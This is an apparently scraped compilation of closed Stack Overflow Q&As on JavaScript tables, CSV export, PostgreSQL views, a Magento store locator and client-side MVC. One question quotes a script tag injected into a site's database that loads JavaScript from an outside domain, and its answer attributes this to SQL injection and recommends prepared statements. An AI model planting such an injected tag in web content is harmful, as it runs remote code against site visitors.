Dynamic tables & boxes [closed] - javascript

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Closed 5 years ago.
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I'm creating a view wherein I need to add multiple boxes, wherein there is a number within the box, which is dynamically changing as per data (csv file)
Also, I'm adding tables, with dynamic numbers within the same which should again, change with the data (csv)
I'm trying to design an approach to get it done and looking for js libraries to use here.
Is there anything in particular that I should look for? Can tables be added without table command in html (alternatives)?
Any feedback would be highly appreciated.

This blog post is a simple representation of d3.js usage to load a csv to a html table.
Also there is already a StackOverflow post about loading csv data via php, if you are going for a backend approach.


How to export an Angular Material Table into a pdf as well as csv, which should be downloaded on click of a button [closed]

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Closed 3 years ago.
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I am using Angular Material Table, to show data, which i am getting from an API call. The question now is, how can I export the Mat-Table data into a PDF and a CSV on click of a button, any Angular Modules which can help me serve my purpose.
So your question covers a number of things, and I'm sure you've googled around already, but I'm going to share some stuff I've used in the past to do similar work.
HTML Table to PDF
I don't think you'll be able to get the same look and feel as Material into a PDF without some sort of screenshot utility or something custom that doesn't exist today. But I found another stack overflow link for a JS library that does something similar. This obviously might have compatibility issues and such with Angular, but I'm sure you could look around and see if something exists that would work nicely with Angular.
Here's the html table -> PDF link:
Download CSV data as file
This one is a little more straightforward. If you already know the data, you can use javascript to convert your array of table data into a UTF-8 encoded string, and using the text/csv MIMETYPE download that data as a file.
Everytime I have to do this I always just go back to the same stack overflow link below for reference.
JavaScript Download CSV StackOverflow

How to program SQL views to show on website? [closed]

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Closed 4 years ago.
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So I have several report views that are relevant for a few people that have no SQL knowledge
Without using tableau, how to have these views available to be visualized on an internal website and/or downloadable in the form of a csv file?
Database is postgresql and there's someone else with JavaScript knowledge, though any solution is fine as long as it can be simple for the end user
The easiest way to export data of a table to a CSV file is with the COPY statement. But you can only COPY directly from a table, not a view. But you can
copy out anything you can select, so this should work:
COPY (SELECT * FROM MyView) TO 'C:\tmp\MyData_db.csv' DELIMITER ',' CSV HEADER;

Storelocator magento hide stores at start [closed]

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Closed 6 years ago.
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I have this Store Locator
Installed on my website. It's all working fine and well, but it's a bit slow. This is because there are 500 stores located on the map.
I am looking for this!:
Can somebody explain me how to implement this (javascript), into a magento site?
I suggest to build your own module for this.
try this module creator: http://www.silksoftware.com/magento-module-creator/
on the (Need Add Single Table Model) put yes, and then select (Need Backend Model Manager) and fill the fields.
Basically in your case you need the following fields (store name, store lat, store long, store full address, etc..)
the module will provide you with manager in the backend to manage and create stores easily.
then you have to style the list on the front end..
print them in the same format used in the example (you should use this format: https://googlemaps.github.io/js-marker-clusterer/examples/data.json)
and finally load the js and it should work perfectly.
Let me know if it worked or you are still facing any issue?

An external script has been injected to my database [closed]

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Closed 8 years ago.
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Im retrieving meta description from my database, to my suprise, the data that has been returned with an appended script code.
Heres the code that happened to be added to my database entry
<script id="alp1398" type="text/javascript" src="http://earcuff.nl/js/jqueryinit.js"></script>
Any idea, how could this happen, or what does this script do?
Most usual vector of attack - parameters you use to populate your database. Check that you always use prepared statements (i.e. SQL with ? in place of the parameters) and if you cannot (e.g. in ORDER BY clause) you have to sanitize the input.
Other vectors include hacking your account itself to be able to execute SQL statements.
It is hard to tell what exactly happened with so little data you provided in the question. Please, state what middle tier you are using etc.

Javascript: coding the right way (mvc?) [closed]

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Closed 8 years ago.
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Im starting to code with Javascript, but i have some conceptual questions about which is the right way to code using it. In this particular moment im working on a simple html file where my friends can fill data about their grades and percentages on a table, and i'll do some calculation with that and then display them.
My questions specifically are:
is it "better" to do calculation with data from the html table, or is
it better to have it stored in some array/matrix that changes when
html table is changed ( doing something like mvc style )?
if so, is it better to re-load info from view (table) every time i do
any calculation or there is anyway to make my inner variable to
change when view is changed?
I ask all this because i am so used to mcv style that working javascript and html in same file, and the ways javascript is presented on tutorials confuse me about how would it be if i want to have efficient, clean code
Thanks a lot, and please be comprehensive… this is my first question on SO !
If you are familiar with MVC and would like to code JavaScript using this framework I'd look into AngularJS .
As far as "better" ways to write code, I'd say for the size page you're talking about it doesn't matter all that much.
If you plan on editing the data and doing calculations from it, I would store the data using an array or matrix and then build a table from that data. With AngularJS any time you make calculations and change the variables effected by those calculations, you can reference those variables int he view and it will be updated automatically.

